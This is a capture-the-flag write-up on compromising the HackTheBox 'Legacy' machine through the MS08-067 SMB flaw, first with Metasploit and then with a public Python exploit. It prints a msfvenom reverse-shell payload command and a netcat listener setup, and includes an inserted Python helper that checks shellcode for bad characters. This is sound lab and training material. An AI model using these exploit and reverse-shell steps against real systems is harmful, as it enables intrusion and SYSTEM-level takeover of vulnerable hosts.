Legacy — HackTheBox writeup

TheNguen
Oct 4, 2020

This is an easy Windows machine.

We begin enumeration with nmap for the ports and services.

sudo nmap -sS -sC -sV -O -oA legacy_nmap_initial_scan 10.10.10.4

The results show Windows Server 2003 SP2.

If we rerun nmap with its vulnerability scripts (--script vuln) it gives us a hint.

MS08-067 and MS17-010. That is a good start; given how old the OS is, there are probably plenty of vulnerabilities.

A query with searchsploit returns the following:

We see a Metasploit module, as expected for an easy HTB box.

Run metasploit, find the module and select it:

use exploit/windows/smb/ms08_067_netapi

Set the options (here only RHOSTS, the target IP, plus LHOST if the default is not your VPN address) and run the exploit. You know the drill.

You should get a meterpreter as NT AUTHORITY\SYSTEM.

You can now read the flags. The difference this time is that there is no "Users" folder in C:\; the user profiles live under "Documents and Settings" instead. Since we are already SYSTEM there is no need for privilege escalation and we can read the root flag right away.

The user flag is on the user's Desktop under "Documents and Settings", where you would expect it.

We can now do the same without metasploit.

Let’s take a look at the searchsploit result again.

We can try the first one, 40279.py, and read through it with -x:

searchsploit -x windows/remote/40279.py

Mirror (copy) the exploit into the working directory:

searchsploit -m windows/remote/40279.py

Now we can generate our payload with msfvenom and edit the Python script.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.X.X LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

Set up a netcat listener on 443 and run the script with the "6" option and the port. The options correspond to the different Windows versions and service packs; each is assigned a digit between 1 and 7 in the script's if statements.

The exploit completes but a shell does not open.

There seems to be some issue with the exploit. You can play around with it to try to get it working, but a modified version of the same exploit is also available on GitHub, so give that a try. Download the modified script.

We again need to generate a payload and replace the shellcode in the Python script with ours in order to get a shell, as per the instructions in the script's comments.

This is how the modified shellcode looks in my case.

Again generated with:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.X.X LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

Once the script has been edited with the new shellcode you can run it.
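Before pasting the msfvenom output into 40279.py or the modified GitHub version, it is worth confirming that the encoder really removed every byte from the -b list and noting the blob's size, since a surviving bad character is one of the first things to rule out when an exploit "completes" without a shell. The script below is an added example written for this writeup; it is not code from the original post, from msfvenom, or from either exploit script. The two sample blobs are constructed stand-ins in msfvenom's "-f py -v shellcode" layout, not real payloads, and the helper names (parse_msfvenom_py, find_badchars, check_shellcode, to_python2_literal) are my own.

```python
"""Sanity-check an msfvenom '-f py -v shellcode' blob before it goes into an exploit.

Added example for this writeup (not code from the post, msfvenom or 40279.py).
"""
import re

# Bad characters the writeup passes to msfvenom -b for this exploit.
BADCHARS = b"\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"

# One line of msfvenom's Python output, e.g.
#   shellcode =  b""              (opening line, b prefix optional)
#   shellcode += b"\xdb\xc0..."   (continuation lines)
_LINE = re.compile(r'^\s*(\w+)\s*(\+?=)\s*b?"((?:\\x[0-9a-fA-F]{2})*)"\s*$')


def parse_msfvenom_py(text, var="shellcode"):
    """Rebuild the raw bytes from msfvenom's '-f py' text output.

    The b prefix is optional because Python 2 exploits such as 40279.py
    omit it; a plain '=' line restarts the buffer, '+=' lines append.
    """
    buf = bytearray()
    seen = False
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m or m.group(1) != var:
            continue
        if m.group(2) == "=":
            buf = bytearray()
        seen = True
        buf += bytes.fromhex(m.group(3).replace("\\x", ""))
    if not seen:
        raise ValueError("no assignment to %r found in the msfvenom output" % var)
    return bytes(buf)


def find_badchars(shellcode, badchars=BADCHARS):
    """Return (offset, byte) for every bad character that survived encoding."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def check_shellcode(text, var="shellcode", badchars=BADCHARS):
    """Parse the blob and summarise length and bad-character hits."""
    sc = parse_msfvenom_py(text, var)
    hits = find_badchars(sc, badchars)
    return {"length": len(sc), "badchars": hits, "ok": not hits}


def to_python2_literal(shellcode, var="shellcode", width=16):
    """Re-emit the bytes as the unprefixed string literal a Python 2 script expects."""
    lines = ['%s = ""' % var]
    for i in range(0, len(shellcode), width):
        chunk = shellcode[i:i + width]
        lines.append('%s += "%s"' % (var, "".join("\\x%02x" % b for b in chunk)))
    return "\n".join(lines)


# Constructed sample in msfvenom's layout; these bytes are a stand-in, not a real payload.
GOOD_SAMPLE = '''shellcode =  b""
shellcode += b"\\xdb\\xc0\\xd9\\x74\\x24\\xf4\\x5b\\x33"
shellcode += b"\\xc9\\xb1\\x52\\x31\\x43\\x17\\x03\\x43"
'''

# Constructed sample with two bytes from the bad-character list slipped in
# (a null at offset 1 and '/' at offset 5), as an encoder miss would look.
BAD_SAMPLE = '''shellcode =  b""
shellcode += b"\\xdb\\x00\\xd9\\x74\\x24\\x2f\\x5b\\x33"
'''


if __name__ == "__main__":
    for name, blob in (("good", GOOD_SAMPLE), ("bad", BAD_SAMPLE)):
        print(name, check_shellcode(blob))
    print(to_python2_literal(parse_msfvenom_py(GOOD_SAMPLE)))
```

Run it against the real msfvenom output by pasting that text in place of GOOD_SAMPLE; if check_shellcode reports any hits, regenerate the payload (or pick another encoder with -e) rather than editing bytes by hand, and use to_python2_literal when the target script is Python 2 and expects a plain string rather than a bytes literal.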

If everything was done correctly you should get a netcat shell.

Once again you are running as NT AUTHORITY\SYSTEM, so you can read both flags.

That was pretty much it for the Legacy box on HTB. It is quite easy with Metasploit, so if you want an extra challenge try it with the script.

I hope you liked the writeup and that it was easy for you to follow along.

Thank you for your time and cya round.
